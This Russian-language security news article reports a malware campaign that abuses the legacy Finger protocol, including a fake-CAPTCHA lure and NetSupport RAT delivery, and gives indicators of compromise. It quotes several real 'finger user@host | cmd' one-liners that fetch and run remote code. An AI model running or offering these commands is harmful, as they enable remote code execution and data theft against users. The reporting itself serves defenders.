Киберпреступники возрождают устаревший Finger-протокол для скрытых атак

Исторически протокол Finger использовался в Unix-системах для получения информации о пользователях, включая логины, имена и время последнего входа. Хотя соответствующая утилита позже была портирована в Windows, сегодня этот протокол практически не применяется в легитимных целях. Однако его редкость стала преимуществом для киберпреступников, ищущих обходные пути для доставки вредоносного кода.

В конце прошлого месяца исследовательская группа MalwareHunterTeam обнаружила пакетный файл, который при выполнении использовал команду "finger root@finger.nateams[.]com" для получения инструкций с удаленного сервера. Эти команды затем автоматически выполнялись на устройстве жертвы через командный процессор cmd.exe. Хотя первоначально используемый домен стал недоступен, вскоре были выявлены новые образцы вредоносного программного обеспечения, использующие аналогичную схему.

Особую озабоченность вызывает недавний случай, описанный на Reddit, где пользователь стал жертвой атаки, маскировавшейся под проверку CAPTCHA. Мошенники убедили его выполнить команду "finger vke@finger.cloudmega[.]org | cmd", что привело к загрузке и выполнению вредоносного кода. Хотя этот конкретный сервер больше не отвечает, анализ показал, что атака была тщательно спланирована.

Механизм работы таких атак достаточно прост, но эффективен. Злоумышленники используют протокол Finger как канал для доставки удаленных скриптов. Полученные команды автоматически выполняются в системе, создавая случайные пути, копируя легитимные утилиты вроде curl.exe под другими именами и загружая вредоносные архивы, замаскированные под PDF-файлы. После распаковки архива запускается Python-пакет, содержащий функционал для кражи информации.

Более продвинутая вариация атаки, использующая команду "finger Kove2@api.metrics-strange.com | cmd", демонстрирует усложнение тактик злоумышленников. Код проверяет наличие на системе инструментов анализа вредоносного программного обеспечения, таких как Wireshark, Process Monitor и отладчики. Если такие инструменты не обнаружены, атака продолжается, загружая и устанавливая программу удаленного доступа NetSupport Manager RAT с последующей настройкой задания планировщика для автоматического запуска при входе пользователя в систему.

Эксперты отмечают, что подобное злоупотребление протоколом Finger ранее наблюдалось в 2020 году, когда утилита использовалась как LOLBIN (Living Off the Land Binaries) для загрузки вредоносного программного обеспечения и обхода систем обнаружения. Нынешняя кампания демонстрирует продолжение этой тенденции, хотя пока свидетельствует об активности одной группы угроз.

Для защиты от подобных атак специалисты рекомендуют заблокировать исходящий трафик на TCP-порт 79, используемый протоколом Finger. Кроме того, важно соблюдать базовые правила кибергигиены: не выполнять непонятные команды, какими бы безобидными они ни казались, и использовать современные антивирусные решения. Особую осторожность следует проявлять при encountering подозрительных запросов на проверку личности, особенно тех, что требуют выполнения команд в командной строке.

Хотя масштабы текущей кампании ограничены, возрождение устаревших протоколов демонстрирует адаптивность киберпреступников, постоянно ищущих новые пути для обхода систем безопасности. Специалисты предупреждают, что по мере того как пользователи продолжают попадаться на уловки социальной инженерии, следует ожидать дальнейшего развития подобных тактик.

Domains

• api.metrics-strange.com
• cloudmega.org

Emails

• kove2@api.metrics-strange.com
• root@finger.nateams.com
• vke@finger.cloudmega.org

MD5

• 66826c32542df6a3a6e73919958df5e5

SHA1

• bab579b550c8bcffea516eb019375099ad4c2c74

SHA256

• 713d4846f83ef09befbb07f27e2f374b766b8aca4a5a1e937ba39b4dbe3c022d